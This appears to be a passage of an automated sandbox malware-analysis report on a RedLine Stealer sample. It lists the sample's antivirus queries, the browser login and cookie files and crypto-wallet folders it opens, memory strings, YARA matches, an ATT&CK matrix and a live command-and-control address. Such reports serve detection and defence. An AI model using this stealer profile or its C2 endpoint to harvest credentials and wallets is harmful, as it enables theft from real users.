Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018B2FE GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0018B2FE

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00175032 GetVersionExW,

0_2_00175032

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: PO.exe, 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	13 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	241 Virtualization/Sandbox Evasion	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
w4XFffGDz1.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
w4XFffGDz1.exe	67%	Virustotal		Browse
w4XFffGDz1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	58%	Virustotal		Browse
C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	58%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ip.sb	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://45.137.22.67:55615	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://45.137.22.67:55615/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://45.137.22.67:55615/	3%	Virustotal		Browse
http://45.137.22.67:55615	3%	Virustotal		Browse
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://schemas.datacontract.org/2004/07/	0%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://api.ip.sb/geoip	0%	Virustotal		Browse
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettings	2%	Virustotal		Browse
https://api.ip.sb	0%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnectResponse	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Virustotal		Browse
https://api.ip.sb/geoip	0%	Avira URL Cloud	safe
https://api.ip.sb	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://www.w3.or	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://tempuri.org/	0%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	2%	Virustotal		Browse
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	Avira URL Cloud	safe
45.137.22.67:55615	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
